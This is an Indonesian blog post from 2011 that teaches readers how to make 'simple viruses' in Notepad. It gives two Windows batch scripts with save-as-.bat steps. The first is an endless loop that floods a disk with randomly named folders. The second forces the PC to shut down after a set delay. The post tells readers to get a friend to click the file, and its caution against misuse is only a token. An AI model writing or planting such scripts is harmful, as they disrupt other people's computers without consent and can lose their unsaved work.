Loading Pencarian

Membuat Virus Sederhana Dengan Notepad

Posted by samcro on Monday, May 30, 2011


Sob,sekarang saya mau kasih ni tips ringan bagi sobat yang pengen buat virus sederhana dan ngak ribet tapi tentunya maknyus,,hehehe.Namun,ingat ini digunakan untuk hal-hal yang bermanfaat aja ya jangan disalah gunakan fungsinya virus yang saya share ini.Eh bukan saya yang buat virusnya ya nanti sobat ngejauh lagi,hehehe.




1.Cara membuat 1000 Folder dalam sekejap :
Caranya---

  • Buka Notepad
  • Copy Paste Kode Berikut ke dalam Notepad

    @echo off
    : top
    md %random%
    goto top

  • Masukan kode di atas kedalam Notepad
  • Setelah itu klik menu "File" -> "Save As..."
  • Lalu ubah Save as typenya menjadi "All Files"
  • Ketikan nama yang akan disave yang berakhiran ".bat" misalnya (awasadasule.bat) -> Save
  • Hingga file tersebut menjadi seperti ini
  • Apabila temen sobat mnegklik file tersebut, Jreng!! file tersebut akan menggundang banyak folder.
  • Selesai
2.Membuat PC Shut Down dengan Sendirinya

  • Caranya sama dengan yang di atas,hanya codenya saja yang beda.Berikut Code virus ke-2
  • Copy Paste Kode Berikut ke dalam Notepad


@echo
shutdown -s -t "waktu dalam detik(tanpa kutip)" -f

*Keterangan maksud dari "waktu dalam detik(tanpa kutip)" ini adalah sobat bisa mengetikan angka yang sobat mau misalnya 1=detik berarti script itu berkerja dalam 1 detik untuk menshut down secara otomatis.

Sekian Tips dan Trik dari saya Semoga Bermanfaat ^_^

Sumber : http://www.kaskus.us/showthread.php?t=7899483
Gambar sumber : http://www.ex-dot.com

Artikel Yang Terkait :

0 Comments
Comments

{ 0 comments... SilahkanTambah Komentar }

Post a Comment

Jika ada yang perlu ditanyakan silahkan comment aja. Kalo saya bisa jawab pasti akan saya jawab, dan Sebaliknya. Comment yang baik - baik aja jangan bikin Spam saya penuh.

♥ (●̮̮̃•̃)●̮̮̮̮̃̃•̃̃) Peace!!
♥ /█\ /█\
♥_||_ ||_ ♥

Note: Only a member of this blog may post a comment.

Total Tayangan Laman